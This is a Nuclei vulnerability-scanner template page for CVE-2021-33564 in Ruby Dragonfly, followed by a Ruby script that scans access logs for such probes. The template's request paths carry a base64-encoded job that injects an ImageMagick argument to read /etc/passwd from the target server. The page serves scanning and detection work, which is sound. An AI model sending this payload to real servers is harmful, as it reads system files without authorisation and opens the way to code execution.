Ruby Dragonfly <1.4.0 - Remote Code Execution
ID: CVE-2021-33564
Severity: critical
Author: 0xsapra
Tags: cve2021,cve,rce,ruby,injection,dragonfly_project
Description
Ruby Dragonfly before 1.4.0 contains an argument injection vulnerability that allows remote attackers to read and write to arbitrary files via a crafted URL when the verify_url option is disabled. This may lead to code execution. The problem occurs because the generate and process features mishandle use of the ImageMagick convert utility.
YAML Source
id: CVE-2021-33564

info:
  name: Ruby Dragonfly <1.4.0 - Remote Code Execution
  author: 0xsapra
  severity: critical
  description: Ruby Dragonfly before 1.4.0 contains an argument injection vulnerability that allows remote attackers to read and write to arbitrary files via a crafted URL when the verify_url option is disabled. This may lead to code execution. The problem occurs because the generate and process features mishandle use of the ImageMagick convert utility.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Upgrade Ruby Dragonfly to version 1.4.0 or later to mitigate this vulnerability.
  reference:
    - https://zxsecurity.co.nz/research/argunment-injection-ruby-dragonfly/
    - https://github.com/markevans/dragonfly/compare/v1.3.0...v1.4.0
    - https://github.com/markevans/dragonfly/commit/25399297bb457f7fcf8e3f91e85945b255b111b5
    - https://github.com/mlr0p/CVE-2021-33564
    - https://nvd.nist.gov/vuln/detail/CVE-2021-33564
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-33564
    cwe-id: CWE-88
    epss-score: 0.07547
    epss-percentile: 0.93983
    cpe: cpe:2.3:a:dragonfly_project:dragonfly:*:*:*:*:*:ruby:*:*
  metadata:
    max-request: 2
    vendor: dragonfly_project
    product: dragonfly
    framework: ruby
  tags: cve2021,cve,rce,ruby,injection,dragonfly_project

http:
  - method: GET
    path:
      - "{{BaseURL}}/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ=="
      - "{{BaseURL}}/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ=="

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b7e2c15b3abc8d9a917007935cf61bc17dc5629676d054b64969f2b487940f320220370c771cfa41bd8e56c3ee44da4535b619c2972a434a7d6a004f6a11e38b22d3:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-33564.yaml"
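To review web server logs for requests of the kind this template sends, the following added example (not part of the template or of Dragonfly) decodes each URL path segment as a base64 JSON job and flags generate/process steps whose arguments reference a filesystem path. The helper names, the path heuristic and the sample log lines are assumptions constructed for illustration.

```ruby
require "base64"
require "json"

# "g" (generate) is the step code in the template's payload; "p" (process) is
# the other feature the description names.
SUSPECT_STEPS = %w[g p].freeze
# Heuristic (assumption): an argument token naming an absolute or parent-relative
# path, optionally behind an ImageMagick "coder:" prefix.
PATH_TOKEN = %r{\A(?:[a-z0-9]+:)?(?:/|\.\./)}i

# Decode one URL path segment as a job (base64 of a JSON array of steps), or nil.
def decode_job(segment)
  b64 = segment.tr("-_", "+/")
  b64 += "=" * ((4 - b64.length % 4) % 4)
  steps = JSON.parse(Base64.strict_decode64(b64))
  steps.is_a?(Array) && steps.all? { |s| s.is_a?(Array) } ? steps : nil
rescue StandardError # any decode or parse failure: not a job segment
  nil
end

# Return [step_code, name, argument] for each generate/process argument in the
# request path that references a filesystem path.
def suspicious_steps(path)
  jobs = path.split("?").first.to_s.split("/").map { |seg| decode_job(seg) }.compact
  jobs.flatten(1).select { |step| SUSPECT_STEPS.include?(step[0]) }.flat_map do |step|
    hits = step.drop(2).grep(String).select { |arg| arg.split.any? { |t| t.match?(PATH_TOKEN) } }
    hits.map { |arg| [step[0], step[1], arg] }
  end
end

# Scan access-log lines and return [client_ip, flagged_step] pairs.
def scan(lines)
  lines.flat_map do |line|
    path = line[/"(?:GET|HEAD) (\S+)/, 1]
    path ? suspicious_steps(path).map { |step| [line[/\A\S+/], step] } : []
  end
end

# Constructed sample log (documentation IPs). BENIGN is a made-up thumbnail job;
# PROBE is the job segment from the template's request paths.
BENIGN = Base64.urlsafe_encode64(JSON.generate([["f", "2021/05/01/cat.jpg"], ["p", "thumb", "200x200#"]]))
PROBE = "W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ=="
SAMPLE_LOG = [
  %(198.51.100.7 - - [01/Jun/2021:10:00:00 +0000] "GET /system/images/#{BENIGN}/cat.jpg HTTP/1.1" 200 5120),
  %(203.0.113.9 - - [01/Jun/2021:10:00:05 +0000] "GET /system/images/#{PROBE} HTTP/1.1" 200 1843)
].freeze

scan(SAMPLE_LOG).each { |ip, step| puts "#{ip} #{step.inspect}" }
```

A hit with a 200 response, as in the second sample line, is the case to prioritise: it matches the status the template's matcher expects.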